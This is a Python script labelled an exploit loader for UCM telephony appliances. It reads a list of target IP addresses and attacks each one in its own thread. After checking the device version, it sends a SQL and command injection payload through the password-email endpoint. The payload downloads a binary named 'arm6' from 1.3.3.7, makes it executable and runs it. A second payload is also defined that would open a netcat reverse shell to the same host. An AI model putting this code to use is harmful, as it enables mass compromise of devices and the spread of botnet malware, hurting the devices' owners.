[EXPLOIT] UCM Exploit Loader

1. import os
2. import re
3. import sys
4. import json
5. import argparse
6. import requests
7. import threading
8. from requests.packages.urllib3.exceptions import InsecureRequestWarning
9. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
10.  
11. class Loader(object):
12.  
13.     def infect(self, adress: str):
14.         url = 'https://' + adress + ':' + "8089" + '/cgi'
15.         print('[+] Sending getInfo request to ', url)
16.  
17.         try:
18.             resp = requests.post(url=url, data='action=getInfo', verify=False)
19.         except Exception:
20.             print('[-] Error connecting to remote target')
21.             sys.exit(1)
22.        
23.         if resp.status_code != 200:
24.             print('[-] Did not get a 200 OK on getInfo request')
25.             sys.exit(1)
26.        
27.         if resp.text.find('{ "response":') != 0:
28.             print('[-] Unexpected response')
29.             sys.exit(1)
30.        
31.         try:
32.             parsed_response = json.loads(resp.text)
33.         except Exception:
34.             print('[-] Unable to parse json response')
35.             sys.exit(1)
36.        
37.         print('[+] Remote target info: ')
38.         print('\t-> Model: ', parsed_response['response']['model_name'])
39.         print('\t-> Version: ', parsed_response['response']['prog_version'])
40.        
41.         match = re.match('^([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)$',
42.         parsed_response['response']['prog_version'])
43.         if not match:
44.             print('[-] Failed to extract the remote targets version')
45.             sys.exit(1)
46.        
47.         major = int(match[1])
48.         minor = int(match[2])
49.         point = int(match[3])
50.         patch = int(match[4])
51.        
52.         if (major > 1) or (major == 1 and minor > 0) or (major == 1 and minor == 0
53.         and point > 19) or (major == 1 and minor == 0 and point == 19 and patch >=
54.         20):
55.             print('[-] Unaffected version')
56.             sys.exit(1)
57.         else:
58.             print('[+] Vulnerable version!')
59.  
60.         print("[+] loaded, %s" %(adress))
61.         try:
62.             exploit = "admin\' or 1=1--`;cd /var/; wget http://1.3.3.7/arm6 ; chmod 777 arm6 ; ./arm6 UCM" #arm7
63.             exploit2 = 'admin\' or 1=1--`;`nc${IFS}' + "1.3.3.7" + '${IFS}' + "1270" + '${IFS}-e${IFS}/bin/sh`;`'
64.             resp = requests.post(url=url,
65.         data='action=sendPasswordEmail&user_name=' + exploit, verify=False)
66.         except Exception as err:
67.             print('[-] Failed to send payload')
68.             sys.exit(1)
69.        
70.         if resp.status_code != 200:
71.             print('[-] Did not get a 200 OK on sendPasswordEmail request')
72.             sys.exit(1)
73.        
74.         try:
75.             parsed_response = json.loads(resp.text)
76.         except Exception:
77.             print('[-] Unable to parse json response')
78.             sys.exit(1)
79.        
80.         if parsed_response['status'] == 0:
81.             print('[+] Success! Clean exit.')
82.         else:
83.             print('[-] Something bad happened.')
84.            
85.     def __init__(self, adress: str):
86.         self.infect(adress)
87.  
88. with open(sys.argv[1], "r") as f:
89.     for item in f.readlines():
90.         threading.Thread(target=Loader, args=(item.rstrip(), )).start()